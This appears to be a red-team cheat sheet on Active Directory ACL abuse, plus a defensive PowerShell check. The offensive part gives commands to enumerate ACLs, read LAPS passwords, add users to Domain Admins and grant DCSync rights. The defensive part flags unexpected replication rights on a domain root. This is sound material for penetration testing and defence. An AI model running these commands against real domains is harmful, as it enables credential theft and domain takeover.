# ACL Abuse

## Enumeration

{% tabs %}
{% tab title="ADModule" %}

```
# Import
Import-Module C:\ADModule\Microsoft.ActiveDirectory.Management.dll
Import-Module C:\ADModule\ActiveDirectory\ActiveDirectory.psd1

# Get DistinguishedName
Get-ADUser -Identity USER

# Find ACLs related to that user
(Get-Acl 'AD:\CN=USER,CN=Users,DC=it,DC=gcb,DC=local').Access
```

{% endtab %}

{% tab title="PowerView\_Dev" %}

```
Find-InterestingDomainACL -ResolveGUIDs
```

{% endtab %}

{% tab title="PowerView" %}

```
Invoke-ACLScanner -ResolveGUIDs
```

{% endtab %}
{% endtabs %}

## ReadProperty, ExtendedRight over OU / Computer Object

Most likely LAPS. The principal shown in `IdentityReferenceName` can read the cleartext LAPS password for computers in the OU.

{% tabs %}
{% tab title="LAPS Module" %}

```
# Import module
Import-Module C:\AD\Tools\AdmPwd.PS\AdmPwd.PS.psd1

# Find the principals that can read LAPS passwords for the OU
Find-AdmPwdExtendedRights -Identity <OU>

# Once we have compromised a user that can read LAPS
Get-AdmPwdPassword -ComputerName <targetmachine>
```

{% endtab %}
{% endtabs %}

## WriteProperty | Self-Membership | GenericAll over Group

Can add members to the group.

{% tabs %}
{% tab title="ADModule" %}

```
# Add
Add-ADGroupMember -Identity "LocalAdmins" -Members USERS

# Check
Get-ADGroupMember -Identity "LocalAdmins"
```

{% endtab %}

{% tab title="PowerView\_dev" %}

```
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y'
```

{% endtab %}
{% endtabs %}

## GenericWrite | GenericAll | WriteProperty over Computer Object

Can perform a resource-based constrained delegation (RBCD) attack.


## GenericAll over User Object

Can reset the user's password without knowing the old one.


## WriteDACL over DC

Can grant DCSync privileges to a user.

{% tabs %}
{% tab title="RACE" %}

```
Set-ADACL -SamAccountName USER\DOMAIN -DistinguishedName 'DC=techcorp,DC=local' -GUIDRight DCSync -Server techcorp.local -Verbose
```

{% endtab %}

{% tab title="PowerView3" %}

```
Add-DomainObjectAcl -PrincipalIdentity USER -Rights DCSync
```

{% endtab %}
{% endtabs %}
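
A defender-side check for the condition this section depends on, as an added example that is not part of the original page or of RACE/PowerView: it filters a domain-root ACL for principals outside an expected baseline that hold `WriteDacl`, `GenericAll`, or the replication extended rights DCSync needs. The function name `Find-UnexpectedReplicationAce`, the baseline list, the `TECHCORP` NetBIOS name and the sample ACEs are assumptions constructed for illustration.

```powershell
# Added example: report who can replicate secrets, or rewrite the DACL, on a domain root.
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}
# Assumed baseline of principals expected to hold these rights; tune per domain.
$ExpectedPrincipals = @(
    'NT AUTHORITY\SYSTEM', 'NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS',
    'BUILTIN\Administrators', 'TECHCORP\Domain Controllers',
    'TECHCORP\Domain Admins', 'TECHCORP\Enterprise Admins'
)

function Find-UnexpectedReplicationAce {
    param(
        [Parameter(Mandatory, ValueFromPipeline)] $Ace,
        [string[]] $Allow = $ExpectedPrincipals
    )
    process {
        if ("$($Ace.AccessControlType)" -ne 'Allow') { return }   # skip Deny ACEs
        $rights  = "$($Ace.ActiveDirectoryRights)"
        $guid    = "$($Ace.ObjectType)".ToLower()
        $finding = $null
        if ($rights -match 'GenericAll') {
            $finding = 'GenericAll (includes WriteDacl and all extended rights)'
        } elseif ($rights -match 'WriteDacl') {
            $finding = 'WriteDacl (can grant replication rights)'
        } elseif ($rights -match 'ExtendedRight') {
            if ($guid -eq '00000000-0000-0000-0000-000000000000') {
                $finding = 'All extended rights'
            } elseif ($ReplicationRights.ContainsKey($guid)) {
                $finding = $ReplicationRights[$guid]
            }
        }
        if ($finding -and ($Allow -notcontains "$($Ace.IdentityReference)")) {
            [pscustomobject]@{ Principal = "$($Ace.IdentityReference)"; Finding = $finding }
        }
    }
}

# Constructed sample ACEs, shaped like the objects returned in (Get-Acl ...).Access
$sample = @(
    [pscustomobject]@{ IdentityReference = 'TECHCORP\Domain Controllers'; ActiveDirectoryRights = 'ExtendedRight'; ObjectType = '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'; AccessControlType = 'Allow' }
    [pscustomobject]@{ IdentityReference = 'TECHCORP\svc_backup'; ActiveDirectoryRights = 'ExtendedRight'; ObjectType = '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'; AccessControlType = 'Allow' }
    [pscustomobject]@{ IdentityReference = 'TECHCORP\helpdesk'; ActiveDirectoryRights = 'ReadProperty, WriteDacl'; ObjectType = '00000000-0000-0000-0000-000000000000'; AccessControlType = 'Allow' }
)
$sample | Find-UnexpectedReplicationAce
# Live use, with the AD: drive from the Enumeration section loaded:
# (Get-Acl 'AD:\DC=techcorp,DC=local').Access | Find-UnexpectedReplicationAce
```

Any principal this reports on a production domain root should be traced to a change record; an unexplained entry is worth treating as an incident lead.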

## Resources

{% embed url="<https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces>" %}
